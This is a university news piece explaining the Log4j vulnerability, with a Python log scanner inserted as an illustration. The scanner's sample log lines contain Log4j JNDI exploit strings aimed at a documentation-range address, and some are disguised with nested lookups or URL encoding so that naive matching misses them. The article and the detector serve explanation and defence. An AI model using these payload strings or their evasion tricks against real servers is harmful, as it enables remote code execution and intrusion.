The internet was on fire and so was Minecraft
Associate Professor Jens Dietrich from Te Herenga Waka—Victoria University of Wellington explains how a Log4j vulnerability can offer hackers an easy way to access an organisation's computer server.
Earlier this week, a new software vulnerability started to make headlines in major news outlets, with WIRED headlining that "The Internet is on Fire".
Associate Professor Dietrich, from Wellington’s School of Engineering and Computer Science, explains what happened, “A researcher found a vulnerability in a widely used software component called Log4j. It turns out a large number of programmes are using this component, often without being aware of this; they don't use it directly, but indirectly through other components. The issue was amplified by the fact that industry uses increasingly complex software supply chains of such components. While this is perhaps not surprising for business applications, the vulnerability then also showed up in some unexpected places, such as in the popular game Minecraft.
“The Log4j component is actually really useful. It is used to log messages during the execution of a programme to be used later for diagnostic purposes. The problem is that the messages are not just text to be read by a human, but can encode some complex logic. In particular, there is a little-known feature to write a message in a certain format that establishes a network connection to an arbitrary server. In some cases it is possible to feed these messages to a programme by simply using a standard web browser. This can then be used by an attacker to load and execute arbitrary code on the machine that runs the programme. With this in place, all sorts of attacks become possible, for instance encrypting some files and blackmailing the owner of the software. This was the idea behind the recent Waikato hospital ransomware attack.”
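The "message in a certain format" Associate Professor Dietrich refers to is a Log4j lookup string of the form `${jndi:...}`, which can arrive in any request field that an application logs. The following detector, added here as an illustration and not part of the article or of Log4j itself, scans constructed web-server log lines for such lookups after undoing the URL encoding and the nested-lookup rewrites (`${lower:...}`, `${upper:...}`, `${key:-default}`) that Log4j would itself evaluate, so that a logged attempt is not missed merely because it was written in a roundabout way; the log lines and the 203.0.113.0/24 addresses are sample data, not real traffic.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for this example; 203.0.113.0/24 is RFC 5737 documentation space.
SAMPLE_LOGS = [
    '203.0.113.7 - - [10/Dec/2021:10:01:02 +1300] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:10:01:05 +1300] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:10:01:09 +1300] "GET /?q=${${lower:j}ndi:rmi://203.0.113.9/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.8 - - [10/Dec/2021:10:01:12 +1300] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi:dns://203.0.113.9/c%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.10 - - [10/Dec/2021:10:02:00 +1300] "GET /search?q=${date:yyyy} HTTP/1.1" 200 88 "-" "test"',
]

# A lookup whose body contains no further braces, i.e. the innermost one; Log4j evaluates inside-out.
INNERMOST = re.compile(r'\$\{([^{}]*)\}')

def _resolve(match: re.Match) -> str:
    """Evaluate the few lookups commonly used to disguise a jndi lookup; keep every other lookup literally."""
    body = match.group(1)
    name, sep, rest = body.partition(':')
    if sep and name.lower() == 'lower':
        return rest.lower()
    if sep and name.lower() == 'upper':
        return rest.upper()
    if ':-' in body:                      # ${key:-default}: an unset key evaluates to the default text
        return body.split(':-', 1)[1]
    return match.group(0)                 # jndi:, date:, env: and the rest stay as written

def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode, then evaluate nested lookups inside-out until the text stops changing."""
    text = unquote(text)
    for _ in range(max_rounds):
        rewritten = INNERMOST.sub(_resolve, text)
        if rewritten == text:
            break
        text = rewritten
    return text

JNDI_LOOKUP = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)

def find_lookups(lines):
    """Return (1-based line number, normalized line) for every line that carries a jndi lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        normalized = normalize(line)
        if JNDI_LOOKUP.search(normalized):
            hits.append((number, normalized))
    return hits

if __name__ == '__main__':
    for number, normalized in find_lookups(SAMPLE_LOGS):
        print(f'line {number}: {normalized}')
```

Only the harmless `${date:yyyy}` lookup on the last sample line is left unflagged; matching on the raw text `${jndi:` alone would have missed two of the three flagged lines.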
Vulnerabilities like this are surprisingly common, and a rapidly growing public registry (the so-called CVE Database) keeps track of them: more than 19,000 vulnerabilities have already been discovered and registered in 2021.
“While there is active research in new methods and tools to develop software that does not allow such vulnerabilities ‘by design’ (some spearheaded by the Programming Language Research group at Te Herenga Waka—Victoria University of Wellington), there is a large number of components written with today's tools that are here to stay for a long time,” says Associate Professor Dietrich.
“The presence of vulnerabilities and other bugs demonstrates that with software we have a tool to create complexity we struggle to understand and control (perhaps a bit like the stock market). In particular, we need much better methods to understand the impact the widespread reuse of code from open source repositories like GitHub has.
“This is an exciting prospect for anybody who is interested in software engineering and cybersecurity. At Te Herenga Waka, we have some great programmes in these areas to prepare students for future careers in this field. Several staff are actively researching security aspects of code, developing new exciting tools for this purpose, and have experienced success in discovering vulnerabilities and critical flaws in widely used commodity software.”